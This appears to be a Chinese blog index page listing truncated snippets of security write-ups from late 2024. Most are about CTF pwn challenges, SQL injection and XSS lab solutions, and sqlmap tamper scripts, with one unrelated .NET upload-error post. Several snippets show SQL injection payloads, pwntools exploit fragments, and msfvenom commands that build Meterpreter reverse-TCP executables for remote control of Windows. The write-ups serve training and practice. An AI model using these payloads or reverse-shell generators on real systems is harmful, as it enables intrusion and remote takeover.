- 2024-11-202024源鲁杯部分wp
pwn[Round1]giaopwnexp:#-*-coding:utf-8-*-frompwnimport*#fromLibcSearcherimport*#p=process("./pwn")p=remote("challenge.yuanloo.com",24519)elf=ELF("./pwn")#libc=ELF("./libc.so.6")context
- 2024-11-19Pwnable_Start
初始阶段先查文件信息start题目,通通没有开启。获得信息,小端序分析阶段发现没有main函数,只有汇编代码运行看一下这里esp先入栈,随后的xor等清空寄存器,然后又push进去了Let`sstarttheCTF:的字符。下面提醒调用了sys_write函数,即调用80h中断的四号程序sys_write显示
- 2024-11-19NetCore 3.1 大文件上传报错--413 Payload Too Large
十年河东,十年河西,莫欺少年穷学无止境。,精益求精1、报错信息如下:RequestURL:https://xx.com/webapi/api/ad_video/UploadRequestMethod:POSTStatusCode:413PayloadTooLargeRemoteAddress:106.15.105.219:443ReferrerPolicy:strict-origin-when-cross-origin
- 2024-11-18[BUUCTF] 萌新pwn
做下第一页test_your_nc直接是/bin/sh,nc上去就行rip先简单review一下函数调用栈的变化。首先记住栈是高地址向低地址增长,简单讲就是栈底在高地址,栈顶在低地址。esp保存栈顶,ebp保存栈底。32位为例,首先反向压入callee的参数:argn,....arg2,arg2,然后压入retaddr,这
- 2024-11-18CTF吧-渗透测试靶场-综合漏洞靶场
这关为php反序列化抓包,修改download_file=1.jpg为download_file=upload.php去查看uploda.php的源代码<?phpheader('Content-type:text/html;charset=utf-8');if(isset($_POST['download_file'])){$file=$_POST['download_file'];if(preg_
- 2024-11-17SQLI LABS | Less-49 GET-Error Based-String-Blind-ORDER BY CLAUSE
关注这个靶场的其它相关笔记:SQLILABS——靶场笔记合集-CSDN博客0x01:过关流程输入下面的链接进入靶场(如果你的地址和我不一样,按照你本地的环境来): http://localhost/sqli-labs/Less-49/本关考察的其实是ORDERBY后的注入(虽然它被归结到了堆叠注入中,但其实它并不是)。
- 2024-11-15ISCTF比赛PWN题前三题题解
萌新第一次发布题解,如有错误还请各位大佬指出。本次比赛个人pwn出题情况,还是太菜了,后面四题基本看不懂girlfriend解题思路:利用填充覆盖检查位置,绕过前面admin检查,进入vuln函数,经过动调发现,每次数据存放位置,从而达到提权解题过程存在后门函数read可以读取0x30大小,观察buf
- 2024-11-11bp靶场之xss
靶场链接https://portswigger.net/web-security/all-labsxss备忘录:https://portswigger.net/web-security/cross-site-scripting/cheat-sheet将XSS反射到HTML上下文中,无需任何编码搜索123后,url上出现123,页面也直接回显123,说明可能有反射xsshttps://0a1a0050044ea608c471
- 2024-11-10[GYCTF2020]Blacklist
题目链接:[GYCTF2020]Blacklist。打开环境后如下所示。尝试输入1,回显如下。输入'后发现存在报错。尝试使用联合注入,发现存在检测select等关键词。因此尝试下堆叠注入。首先是查询数据库。Payload:0'%3bshow+databases%3b%23。其次是查询当前数据库存在什么表。Pa
- 2024-11-09CTF-WEB: python模板注入
漏洞是如何产生的?Python模板注入漏洞通常出现在使用模板引擎生成动态内容的应用中。如果用户输入没有经过适当的处理直接插入模板中,就可能会导致模板注入漏洞。一个常见的例子是使用Jinja2模板引擎时,如果直接渲染用户输入,则可能导致代码执行等严重后果。以下是一个演示如
- 2024-11-04xss-labs题解
xss—labsxss—labslevel1(GET型)level2(闭合)level3(htmlspecialchars绕过)level4(左右尖括号过滤)level5(a标签法)level6(大小写绕过)level7(双写绕过)level8(利用href自动Unicode解码特性)level9(注释绕过后端判断)xss—labs题目链接BUUCTF在线评测题目源码xss-lab/lev
- 2024-11-02[极客大挑战 2019]BabySQL
题目链接:https://buuoj.cn/challenges#[极客大挑战2019]BabySQL打开环境后如下所示。尝试以下几种方法的万能密码:不加单引号。加单引号。加双引号。发现加入了单引号后,有SQL错误提示,但是可以发现,题目似乎过滤了用户输入的"or"。接下来,尝试双写绕过。发现可以成
- 2024-11-02[强网杯 2019]随便注
题目链接:https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后,如下所示。通过输入',确认该处是由单引号闭合。通过输入Payload:'unionselect1;#,可以发现后端对一些关键词进行了过滤。尝试堆叠注入,可以查询到数据库名以及当前使用的数据库中存在的表名。Payload:'%
- 2024-11-02[极客大挑战 2019]LoveSQL
题目链接:https://buuoj.cn/challenges#[极客大挑战2019]LoveSQL。打开环境后,如下所示。尝试SQL注入(万能密码)。Payload:admin'+or+1%3d1%3b%23。(笔者通过简单粗暴的尝试:①没有使用单引号;②使用单引号;③使用双引号,来确定后端拼接的SQL语句中的password参数系使用单引号
- 2024-11-01sqlmap的tamper详解
sqlmap的tamper详解使用方法:sqlmap.pyXXXXX-tamper"模块名"各个tamper的作用下面针对sqlmap自带的tamper做一下简单的解释。apostrophemask.py:returnpayload.replace(''',"%EF%BC%87")ifpayloadelsepayload将单引号url编码,用于过滤了单引号的情况。1'AND'1&
- 2024-11-01利用Msfvenom对Windows进行远程控制
一、准备工作先在kali安装Apache2,下载代码如下sudoaptinstallapache2 启动Apache2服务serviceapache2start 在kali浏览器中输入你的kaliIP,得到该页面说明启动成功二、开始1.msf远控生成(1)在kali运行msf生成exemsfvenom-pwindows/meterpreter/reverse_t
- 2024-10-31[强网杯 2019]随便注
题目链接:https://buuoj.cn/challenges#[强网杯2019]随便注打开环境后,如下所示。通过输入',确认该处是由单引号闭合。通过输入Payload:'unionselect1;#,可以发现后端对一些关键词进行了过滤。尝试堆叠注入,可以查询到数据库名以及当前使用的数据库中存在的表名。Payload:'%
- 2024-10-31攻防世界5
cgpwn2发现是32位文件打开main函数发现hello双击进入这里我们发现栈溢出了,双击name我们发现了bss发现这题的system有点问题,后门需要我们自己输入,刚好有bss我们直接用它知道system的地址exp:frompwnimport*context(os='linux',arch='i386',log_level='debug')
- 2024-10-30我用这个 AI 工具生成单元测试,简直不要太爽!
本文分享如何使用驭码CodeRider的单元测试功能生成单元测试文件。在之前的文章如何用Python手撸一个GitLab代码安全审查工具?中,我用Python写了一个接受极狐GitLab代码安全审计事件流并且将消息推送到钉钉群的脚本,完整的python代码为:fromfastapiimportFastAPI
- 2024-10-29Meterpreter生成被控端并进行远程控制
Meterpreter生成被控端并进行远程控制Meterpreter简介Meterpreter是kali中自带的用于渗透测试和漏洞利用的工具,它的本质上是一种payload,允许使用者使用命令行执行命令的生成及执行生成木马msfvenom-pwindows/x64/meterpreter/reverse_tcplhost=本机的iplport=5000-fexe
- 2024-10-29BUUCTF pwn学习日记
我是纯新手,零基础的开始学Pwn喽时间:2024年10月29日BUUCTFPwn学习日记1.test_your_nc下载附件,用IDA打开发现直接nc就可以获得flagcatflag得到flag{07c0b69c-dcbf-4991-8cc6-05660b1a2dd2}2.ripIDA打开发现没有看见有用信息,Shift+F12发现了/bin/sh初步怀疑是栈溢
- 2024-10-26Metasploit被控端与主控端的使用
Metasploit被控端与主控端的使用确认IP地址首先我们先查看一下攻击机和靶机的ip地址攻击机ip:192.168.126.129靶机IP:125.217.53.83ps:后面电脑重启了,ip不一定对的上生成被控端我们先使用输入msfvenom命令生成一个payload,这是以下参数的解释:-p:使用反向远程控制程序“wind
- 2024-10-26xss-labs靶场第十三关测试报告
目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、注入点寻找2、使用hackbar进行payload测试3、抓包进行payload测试4、绕过结果四、源代码分析五、结论一、测试环境1、系统环境渗透机:本机(127.0.0.1)靶 机:本机(127.0.0.1)2、使用工
- 2024-10-26xss-labs靶场第十二关测试报告
目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、注入点寻找2、使用hackbar进行payload测试3、绕过结果四、源代码分析五、结论一、测试环境1、系统环境渗透机:本机(127.0.0.1)靶 机:本机(127.0.0.1)2、使用工具/软件火狐浏览器的hac